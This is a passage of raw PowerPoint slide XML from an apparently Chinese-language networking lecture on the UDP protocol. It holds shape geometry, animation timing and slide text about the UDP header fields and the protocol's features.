              <a:gd name="T10" fmla="*/ 6976 w 4590256"/>
              <a:gd name="T11" fmla="*/ 70947 h 434362"/>
              <a:gd name="T12" fmla="*/ 6976 w 4590256"/>
              <a:gd name="T13" fmla="*/ 354727 h 434362"/>
              <a:gd name="T14" fmla="*/ 6944 w 4590256"/>
              <a:gd name="T15" fmla="*/ 404896 h 434362"/>
              <a:gd name="T16" fmla="*/ 6866 w 4590256"/>
              <a:gd name="T17" fmla="*/ 425674 h 434362"/>
              <a:gd name="T18" fmla="*/ 110 w 4590256"/>
              <a:gd name="T19" fmla="*/ 425674 h 434362"/>
              <a:gd name="T20" fmla="*/ 32 w 4590256"/>
              <a:gd name="T21" fmla="*/ 404896 h 434362"/>
              <a:gd name="T22" fmla="*/ 0 w 4590256"/>
              <a:gd name="T23" fmla="*/ 354727 h 434362"/>
              <a:gd name="T24" fmla="*/ 0 w 4590256"/>
              <a:gd name="T25" fmla="*/ 7094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90256"/>
              <a:gd name="T40" fmla="*/ 0 h 434362"/>
              <a:gd name="T41" fmla="*/ 4590256 w 4590256"/>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90256" h="434362">
                <a:moveTo>
                  <a:pt x="0" y="72395"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="53195"/>
                  <a:pt x="7627" y="34781"/>
                  <a:pt x="21204" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34781" y="7627"/>
                  <a:pt x="53195" y="0"/>
                  <a:pt x="72395" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4517861" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4537061" y="0"/>
                  <a:pt x="4555475" y="7627"/>
                  <a:pt x="4569052" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4582629" y="34781"/>
                  <a:pt x="4590256" y="53195"/>
                  <a:pt x="4590256" y="72395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4590256" y="361967"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4590256" y="381167"/>
                  <a:pt x="4582629" y="399581"/>
                  <a:pt x="4569052" y="413158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4555475" y="426735"/>
                  <a:pt x="4537061" y="434362"/>
                  <a:pt x="4517861"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en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>目的端口</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43015" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4787900" y="3284538"/>
            <a:ext cx="2232025" cy="434975"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4590256"/>
              <a:gd name="T1" fmla="*/ 73319 h 434362"/>
              <a:gd name="T2" fmla="*/ 32 w 4590256"/>
              <a:gd name="T3" fmla="*/ 21474 h 434362"/>
              <a:gd name="T4" fmla="*/ 110 w 4590256"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 6866 w 4590256"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 6944 w 4590256"/>
              <a:gd name="T9" fmla="*/ 21474 h 434362"/>
              <a:gd name="T10" fmla="*/ 6976 w 4590256"/>
              <a:gd name="T11" fmla="*/ 73319 h 434362"/>
              <a:gd name="T12" fmla="*/ 6976 w 4590256"/>
              <a:gd name="T13" fmla="*/ 366591 h 434362"/>
              <a:gd name="T14" fmla="*/ 6944 w 4590256"/>
              <a:gd name="T15" fmla="*/ 418436 h 434362"/>
              <a:gd name="T16" fmla="*/ 6866 w 4590256"/>
              <a:gd name="T17" fmla="*/ 439910 h 434362"/>
              <a:gd name="T18" fmla="*/ 110 w 4590256"/>
              <a:gd name="T19" fmla="*/ 439910 h 434362"/>
              <a:gd name="T20" fmla="*/ 32 w 4590256"/>
              <a:gd name="T21" fmla="*/ 418436 h 434362"/>
              <a:gd name="T22" fmla="*/ 0 w 4590256"/>
              <a:gd name="T23" fmla="*/ 366591 h 434362"/>
              <a:gd name="T24" fmla="*/ 0 w 4590256"/>
              <a:gd name="T25" fmla="*/ 73319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90256"/>
              <a:gd name="T40" fmla="*/ 0 h 434362"/>
              <a:gd name="T41" fmla="*/ 4590256 w 4590256"/>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90256" h="434362">
                <a:moveTo>
                  <a:pt x="0" y="72395"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="53195"/>
                  <a:pt x="7627" y="34781"/>
                  <a:pt x="21204" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34781" y="7627"/>
                  <a:pt x="53195" y="0"/>
                  <a:pt x="72395" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4517861" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4537061" y="0"/>
                  <a:pt x="4555475" y="7627"/>
                  <a:pt x="4569052" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4582629" y="34781"/>
                  <a:pt x="4590256" y="53195"/>
                  <a:pt x="4590256" y="72395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4590256" y="361967"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4590256" y="381167"/>
                  <a:pt x="4582629" y="399581"/>
                  <a:pt x="4569052" y="413158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4555475" y="426735"/>
                  <a:pt x="4537061" y="434362"/>
                  <a:pt x="4517861"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C729"/>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1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>校验和</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43016" name="TextBox 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="2420938"/>
            <a:ext cx="331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0</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3017" name="TextBox 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4356100" y="24209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15</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3018" name="TextBox 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6616700" y="24209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31</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p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43013"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4301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4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="43012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="43015"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43015"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43015"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43015"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43015"/>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17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="43011"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43011"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43011"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43011"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43011"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="43014"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43014"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43014"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43014"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43014"/>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43016"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43016"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43016"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="430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3017"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43017"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43017"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="430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3018"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43018"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43018"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="430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ldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="43012" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="43013" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="43016" grpId="0" bldLvl="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4155F473-3179-48D3-8BF5-9221718C38A8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>UDP协议的特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Freeform 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="2084388"/>
            <a:ext cx="7561262" cy="579437"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7560840"/>
              <a:gd name="T1" fmla="*/ 95405 h 580320"/>
              <a:gd name="T2" fmla="*/ 28347 w 7560840"/>
              <a:gd name="T3" fmla="*/ 27942 h 580320"/>
              <a:gd name="T4" fmla="*/ 96767 w 7560840"/>
              <a:gd name="T5" fmla="*/ 0 h 580320"/>
              <a:gd name="T6" fmla="*/ 7467862 w 7560840"/>
              <a:gd name="T7" fmla="*/ 0 h 580320"/>
              <a:gd name="T8" fmla="*/ 7536290 w 7560840"/>
              <a:gd name="T9" fmla="*/ 27942 h 580320"/>
              <a:gd name="T10" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T11" fmla="*/ 95405 h 580320"/>
              <a:gd name="T12" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T13" fmla="*/ 477015 h 580320"/>
              <a:gd name="T14" fmla="*/ 7536290 w 7560840"/>
              <a:gd name="T15" fmla="*/ 544477 h 580320"/>
              <a:gd name="T16" fmla="*/ 7467862 w 7560840"/>
              <a:gd name="T17" fmla="*/ 572421 h 580320"/>
              <a:gd name="T18" fmla="*/ 96767 w 7560840"/>
              <a:gd name="T19" fmla="*/ 572421 h 580320"/>
              <a:gd name="T20" fmla="*/ 28347 w 7560840"/>
              <a:gd name="T21" fmla="*/ 544477 h 580320"/>
              <a:gd name="T22" fmla="*/ 0 w 7560840"/>
              <a:gd name="T23" fmla="*/ 477015 h 580320"/>
              <a:gd name="T24" fmla="*/ 0 w 7560840"/>
              <a:gd name="T25" fmla="*/ 95405 h 5803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60840"/>
              <a:gd name="T40" fmla="*/ 0 h 580320"/>
              <a:gd name="T41" fmla="*/ 7560840 w 7560840"/>
              <a:gd name="T42" fmla="*/ 580320 h 5803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60840" h="580320">
                <a:moveTo>
                  <a:pt x="0" y="96722"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="71070"/>
                  <a:pt x="10190" y="46468"/>
                  <a:pt x="28329" y="28329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46468" y="10190"/>
                  <a:pt x="71070" y="0"/>
                  <a:pt x="96722" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7464118" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7489770" y="0"/>
                  <a:pt x="7514372" y="10190"/>
                  <a:pt x="7532511" y="28329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7550650" y="46468"/>
                  <a:pt x="7560840" y="71070"/>
                  <a:pt x="7560840" y="96722"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7560840" y="483598"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7560840" y="509250"/>
                  <a:pt x="7550650" y="533852"/>
                  <a:pt x="7532511" y="551991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7514372" y="570130"/>
